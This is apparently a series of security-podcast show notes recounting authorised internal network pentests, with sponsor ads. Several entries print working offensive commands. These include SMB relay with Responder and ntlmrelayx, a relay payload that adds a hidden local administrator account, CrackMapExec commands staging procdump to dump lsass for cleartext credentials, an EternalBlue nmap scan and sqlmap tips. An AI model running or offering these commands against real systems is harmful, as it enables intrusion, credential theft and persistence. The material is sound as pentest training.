SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..." Relayed one high-priv cred from one box to another Dumped and cracked a local machine's hash Passed that hash around the network Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from Set the wdigest flag via CrackMapExec Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it: mkdir /share wget https://live.sysinternals.com/procdump64.exe screen -R smb /opt/impacket/examples/smbserver.py -smb2support share /share Then, we ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe: crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"' (more on today's episode show notes)

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is about a pentest that was pretty unique for me. I got to ride shotgun and kind of be in the shadows while helping another team pwn a network. This was an especially interesting one because the client had a lot of great security defenses in place, including: Strong user passwords A SIEM solution that appeared to be doing a great job We did some looking for pwnage opportunities such as: Systems missing EternalBlue patch Systems missing BlueKeep patch What got us a foot in the door was the lack of SMB signing. Check this gist to see how you can use RunFinger.py to find hosts without SMB signing, then use Impacket and Responder to listen for - and pass - high-priv hashes. Side note: I'm working on getting a practical pentesting gist together in the vein of Penetration Testing: A Hands-On Introduction to Hacking and Hacker Playbook.

For Windows VMs Take a snapshot right after the OS is installed, as (I believe) the countdown timer for Windows evaluation mode starts upon first "real" boot. Want to quickly run Windows updates on a fresh Win VM? Try this (here's the source): powershell Install-PackageProvider -Name NuGet -Force powershell Install-Module PSWindowsUpdate -force powershell Set-ExecutionPolicy bypass powershell Import-Module PSWindowsUpdate powershell Get-WindowsUpdate powershell Install-WindowsUpdates -AcceptAll -AutoReboot To turn on remote desktop: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0 To set the firewall to allow RDP: Enable-NetFirewallRule -DisplayGroup "Remote Desktop" To stop the freakin' Windows hosts from going to sleep: powercfg.exe -change -standby-timeout-ac 0 To automate the install of VMWare tools, grab the package from VMWare's site, decompress it, then: setup64.exe /s /v "/qn reboot=r" To set the time zone via command line, run tzutil /l and then you can set your desired zone with something like tzutil /s "Central Standard Time" For Linux VMs Get SSH keys regenerated and install/run openssh server: apt install openssh-server -y mkdir /etc/ssh/default_keys mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/ dpkg-reconfigure openssh-server systemctl enable ssh.service systemctl start ssh.service Then grab some essential pentesting tools using Kali essentials, and keep 'em updated git update Next user group meeting September 30!

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. Today's episode is a continuation of episode #379, where we: Conducted general nmap scans (and additional scans specifically looking for Eternal Blue) Sucked our nmap scans into Eyewitness Captured and cracked some creds with Paperspace Scraped the company's marketing Web site with brutescrape and popped a domain admin account (or so I thought!) Today, the adventure continues with: Checking the environment for CVE-2019-1040 Picking apart the privileges on my "pseudo domain admin" account Making a startling discovery about how almost all corp passwords were stored Enjoy!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! This episode, besides talking about a man who screamed at me for not being on my cell phone, covers another tale of internal network pentest pwnage! Topics/tactics covered include: Review of setting up your DIY pentest dropbox Choosing the right hardware (I'm partial to this NUC) Running Responder to catch creds Using Eyewitness to snag screenshots of stuff discovered with nmap scanning Nmap for Eternal Blue with nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 192.168.0.0/24 Running Sharphound to get a map of the AD environment Cracking creds with Paperspace When cracking, make sure to scrape the customer's public Web sites for more wordlist ideas!

In today's episode, I sit down with Zane West of Proficio. Zane has been in information security for more than 20 years - starting out in the "early days" as a sysadmin and then moved up into global infrastructure architect function in the banking world. Today Zane manages Proficio's solution and product development. I sat down with Zane over Skype to talk about how companies can better analyze and defend their networks against attacks. Specifically, we talk about: How important is it to have an IT background before you jump into security? How can newb(ish) security analysts and pentesters better understand the political/financial struggles a business has, rather than charge in and scream "PWN ALL THE THINGS!" Is there a "right way" to step into an organization, get a lay of the land and discover/prioritize their security risks? Why in the world does it take twenty seven people to run a SOC?! When should an organization consider engaging an MSSP to help them with their security needs? What if your MSP also provides MSSP services? Is that a good or bad thing? What are some tips for successfully deploying a SIEM? What is the cyber kill chain about, and is it only something for the Fortune X companies, or can smaller orgs tip their toe in it as well? (Here's a nice graph to help you understand it)

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. In today's episode I cover some of the nasty "gotchas" I've run into when sending my pentest dropboxes around the country. Curious on how to setup your own portable pentest dropboxes (and/or pentest lab environments)? Check out part 1 and part 2 of the DIY Pentest Lab video series. Here are some of the pain points I cover today: Turn the firewall off Set Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Domain Profile > Windows Firewall: Protect all network connections to Disabled. Do the same for the Standard Profile by changing Computer Configuration > Policies > Administrative Templates > Network > Network Connections > Windows Firewall > Standard Profile > Windows Firewall: Protect all network connections to Disabled. Disable Windows Defender Navigate to Computer Configuration > Administrative Templates > Windows Components > Windows Defender and choose Turn Off Windows Defender. Disable power sleep settings To stop computers from snoozing on the job, head to Computer Configuration > Policies > Administrative Templates > System > Power Management > Sleep Settings and set Allow standby states (S1-S3) when sleeping (plugged in) to Disabled Create a second disk on the Windows management VM and install BitLocker to Go Check out today's show notes at 7ms.us for more info!

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://itpro.tv/7minute. We cover a lot of ground today on a variety of topics: I have an Oculus Quest now and I love it. My handle is turdsquirt if you ever wanna shoot some zombies together. I share a story that yes, does involve poop - but only the mention of it. It's nothing like the epic tale (tail?) of my parents' dog pooping in my son's dresser drawers. I had a really fun pentest recently where I found some good old school SQL injection. I took to Slack to share and since then, several of you have reached out to ask how I found the vulnerability. Here are some steps/tips I talk about on today's episode that will help: Watch Sunny's Burp courses on Pluralsight to enhance your Burp abilities Install CO2 from the BApp store When doing a Web app pentest, feed various fields SQL injection payloads, such as the ones in PayloadsAlltheThings Grab a copy of sqlmap Use sites like this one to help tune your sqlmap commands to find vulnerabilities. In the end, my command I used to dump contents of important tables was this: (See today's show notes on the 7MS Web site for more information!)

I swear this program isn't turning into the Dr. Phil show, but I have to say that sharing tales of fail is extremely therapeutic for me, and based on your comments, it sounds like many of you feel the same way too. Today's takeaways include: Doing a 8-10 hour internal pentest is probably overly ambitious. Seriously, it's really NOT a lot of time. If a client uses a logging/alerting system, vulnerability scanning is very loud to their digital ears Checking for DNS zone transfers is a good idea!

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Ok, I lied a few episodes ago, and I'm sorry! I was on an epic road trip this week and suddenly remembered the pentest that really had the shortest TTDA (time to domain admin) ever. Enjoy that tale on today's podcast! Oh, and I also reference this gist which might help you test your SIEM bells and whistles. Psssst - I'm sorry (but not sorry) but this episode begins with a long story about a dog pooping inside a dresser drawer. If you'd rather skip that, the actual episode begins at about 29:00)

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today's episode is a two-tale story of me failing fantastically at vulnerability scanning early in my security career. Enjoy. Because I didn't at the time. :-)

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode: Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this: opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt Source: Pwning internal networks automagically Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add So the full command would be: ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add' Check today's show notes at https://7ms.us for more information!

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Happy belated 4th of July! Today I've got another fun tale of internal pentest pwnage that comes out of a few recent assessments I did. These tests were really fun because the clients had good defensive measures in place, such as: Having separate accounts for day-to-day operations and administrative/privileged tasks Local Administrator account largely disabled across the enterprise Lean membership in privileged groups (Domain Admins, Enterprise Admins, Schema Admins, etc.) Hard-to-crack passwords! Will I succeed in getting a solid foothold on this network and (hopefully) escalate to Domain Admin? Check out today's episode to find out!